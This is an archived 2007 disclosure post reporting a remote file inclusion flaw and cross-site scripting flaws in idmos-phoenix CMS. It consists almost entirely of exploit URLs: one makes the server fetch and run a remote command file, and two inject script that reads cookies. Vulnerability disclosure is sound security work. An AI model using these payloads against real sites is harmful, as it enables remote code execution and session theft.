Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[Aria-Security] Stuffed Tracker Multiple Cross-Site Scripting VULN

TorrentTrader Classic Mutiple Remote vulnerabilities

new vuln in snewscms.net.ru in lang file

Else If cms Multiple Remote vulnerabilities

From:	HACKERS PAL <security_(at)_soqor.net>
Date:	08.10.2007
Subject:	idmos-phoenix cms Remote File inclusion

Hello,,

IDM-OS
idmos-phoenix cms Remote File inclusion

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net

RFI
core/aural.php?site_absolute_path=http://localhost/cmd.txt?&cmd=dir

Xss
error.php?err_msg=<script>alert(document.cookie);</script>
templates/simple/ia.php?content=<script>alert(document.
cookie);</script>

#WwW.SoQoR.NeT